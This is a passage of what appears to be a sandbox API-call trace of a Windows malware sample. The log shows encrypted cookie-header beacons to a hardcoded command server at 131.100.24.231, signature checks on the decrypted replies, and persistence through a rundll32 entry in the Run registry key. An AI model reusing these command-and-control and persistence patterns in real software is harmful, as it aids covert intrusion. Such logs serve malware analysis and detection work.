Flags=0x8, Size=0x20) returned 0x2b63120 [0509.586] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: iICyCoEuK=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjOKgqttiLC8/nXg9gBkfcZ0CdNMh3Nrww==\r\n") returned 268 [0509.586] GetProcessHeap () returned 0x530000 [0509.586] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63120 | out: hHeap=0x530000) returned 1 [0509.586] GetProcessHeap () returned 0x530000 [0509.586] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0509.586] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0509.586] GetProcessHeap () returned 0x530000 [0509.586] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0509.587] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0509.588] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="pDnfUnKnkXpXuCb", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0509.588] GetProcessHeap () returned 0x530000 [0509.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0509.588] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0509.588] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0509.588] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0509.588] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: iICyCoEuK=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjOKgqttiLC8/nXg9gBkfcZ0CdNMh3Nrww==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0510.834] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0510.834] GetProcessHeap () returned 0x530000 [0510.834] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0510.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x185) returned 1 [0510.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f85, dwNumberOfBytesToRead=0xfe7b, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f85*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0510.834] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0510.834] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0510.834] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0510.834] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0510.834] GetProcessHeap () returned 0x530000 [0510.834] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0510.834] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0510.834] GetProcessHeap () returned 0x530000 [0510.835] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0510.835] GetProcessHeap () returned 0x530000 [0510.835] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0510.835] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0510.835] GetProcessHeap () returned 0x530000 [0510.835] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0510.835] GetProcessHeap () returned 0x530000 [0510.836] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0510.836] GetProcessHeap () returned 0x530000 [0510.836] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0510.836] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0510.836] GetProcessHeap () returned 0x530000 [0510.836] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0510.836] GetProcessHeap () returned 0x530000 [0510.836] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7a948 [0510.837] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948) returned 0x0 [0510.837] BCryptHashData (in: hHash=0x2a7a950, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7a950) returned 0x0 [0510.837] BCryptFinishHash (in: hHash=0x2a7a950, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7a950, pbOutput=0x2cf510) returned 0x0 [0510.837] BCryptDestroyHash (in: hHash=0x2a7a950 | out: hHash=0x2a7a950) returned 0x0 [0510.837] GetProcessHeap () returned 0x530000 [0510.837] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7a948 | out: hHeap=0x530000) returned 1 [0510.837] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0510.837] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0510.839] GetProcessHeap () returned 0x530000 [0510.839] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0510.839] GetProcessHeap () returned 0x530000 [0510.839] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0510.839] GetProcessHeap () returned 0x530000 [0510.840] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0510.840] GetProcessHeap () returned 0x530000 [0510.840] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0510.840] GetProcessHeap () returned 0x530000 [0510.840] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0510.840] GetProcessHeap () returned 0x530000 [0510.840] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0510.840] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0510.841] GetProcessHeap () returned 0x530000 [0510.841] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0510.841] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",JgspcI") returned 96 [0510.841] GetProcessHeap () returned 0x530000 [0510.841] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0510.841] GetProcessHeap () returned 0x530000 [0510.841] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0510.841] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0510.841] GetProcessHeap () returned 0x530000 [0510.842] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0510.842] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",JgspcI") returned 96 [0510.842] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",JgspcI", cbData=0xc2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",JgspcI") returned 0x0 [0510.843] RegCloseKey (hKey=0x670) returned 0x0 [0510.843] GetProcessHeap () returned 0x530000 [0510.843] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0510.843] GetProcessHeap () returned 0x530000 [0510.843] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0510.843] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe77ad) returned 0x102 [0520.872] GetProcessHeap () returned 0x530000 [0520.872] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0520.872] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0520.873] GetProcessHeap () returned 0x530000 [0520.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0520.873] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0520.873] GetProcessHeap () returned 0x530000 [0520.873] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0520.873] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0520.873] GetProcessHeap () returned 0x530000 [0520.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0520.873] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0520.874] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0520.875] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0520.875] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0520.875] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0520.875] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0520.875] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0520.875] GetProcessHeap () returned 0x530000 [0520.875] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0520.875] GetProcessHeap () returned 0x530000 [0520.875] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0520.875] GetProcessHeap () returned 0x530000 [0520.876] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0520.876] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0520.877] GetProcessHeap () returned 0x530000 [0520.877] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0520.877] GetProcessHeap () returned 0x530000 [0520.877] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0520.877] GetProcessHeap () returned 0x530000 [0520.877] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0520.877] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0520.877] GetProcessHeap () returned 0x530000 [0520.877] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0520.877] GetProcessHeap () returned 0x530000 [0520.877] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0520.878] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0520.878] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0520.878] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0520.878] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0520.878] GetProcessHeap () returned 0x530000 [0520.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0520.878] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0520.878] GetProcessHeap () returned 0x530000 [0520.878] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0520.878] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0520.878] GetProcessHeap () returned 0x530000 [0520.878] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0520.878] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0520.878] GetProcessHeap () returned 0x530000 [0520.878] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xfa) returned 0x5d0230 [0520.878] GetProcessHeap () returned 0x530000 [0520.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0520.879] GetProcessHeap () returned 0x530000 [0520.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0520.879] CryptBinaryToStringW (in: pbBinary=0x5d0230, cbBinary=0xfa, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0520.879] GetProcessHeap () returned 0x530000 [0520.879] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a2) returned 0x2a89708 [0520.879] CryptBinaryToStringW (in: pbBinary=0x5d0230, cbBinary=0xfa, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjWPANzKAoOq+Em0pllI/Spumjkj1yWTqMqC3ZV+wC2daB2c+AXeO/BbPMVr0g1q/PW8pZ6xXSvWK5RTdaJPJ60ewI78bXsplopo7ZW3ZMnmfB4QqhCeN3i55Q==", pcchString=0x2cf504) returned 1 [0520.879] GetProcessHeap () returned 0x530000 [0520.879] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0520.879] GetProcessHeap () returned 0x530000 [0520.879] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f40 [0520.879] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: mHErmutvlDykH=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjWPANzKAoOq+Em0pllI/Spumjkj1yWTqMqC3ZV+wC2daB2c+AXeO/BbPMVr0g1q/PW8pZ6xXSvWK5RTdaJPJ60ewI78bXsplopo7ZW3ZMnmfB4QqhCeN3i55Q==\r\n") returned 360 [0520.879] GetProcessHeap () returned 0x530000 [0520.880] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f40 | out: hHeap=0x530000) returned 1 [0520.880] GetProcessHeap () returned 0x530000 [0520.880] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0520.880] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0520.880] GetProcessHeap () returned 0x530000 [0520.881] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0520.881] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0520.882] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="oBpIEaBijFHajEsGgFHQALCBZzOkCROZGGW", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0520.883] GetProcessHeap () returned 0x530000 [0520.883] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0520.883] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0520.883] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0520.883] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0520.883] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: mHErmutvlDykH=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjWPANzKAoOq+Em0pllI/Spumjkj1yWTqMqC3ZV+wC2daB2c+AXeO/BbPMVr0g1q/PW8pZ6xXSvWK5RTdaJPJ60ewI78bXsplopo7ZW3ZMnmfB4QqhCeN3i55Q==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0522.037] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0522.037] GetProcessHeap () returned 0x530000 [0522.038] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0522.038] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x166) returned 1 [0522.039] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f66, dwNumberOfBytesToRead=0xfe9a, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f66*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0522.039] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0522.040] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0522.040] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0522.040] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0522.040] GetProcessHeap () returned 0x530000 [0522.040] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0522.040] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0522.041] GetProcessHeap () returned 0x530000 [0522.041] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0522.041] GetProcessHeap () returned 0x530000 [0522.041] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0522.041] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0522.043] GetProcessHeap () returned 0x530000 [0522.043] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0522.043] GetProcessHeap () returned 0x530000 [0522.043] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0522.043] GetProcessHeap () returned 0x530000 [0522.043] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0522.043] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0522.043] GetProcessHeap () returned 0x530000 [0522.044] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0522.044] GetProcessHeap () returned 0x530000 [0522.044] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0522.044] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0522.044] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 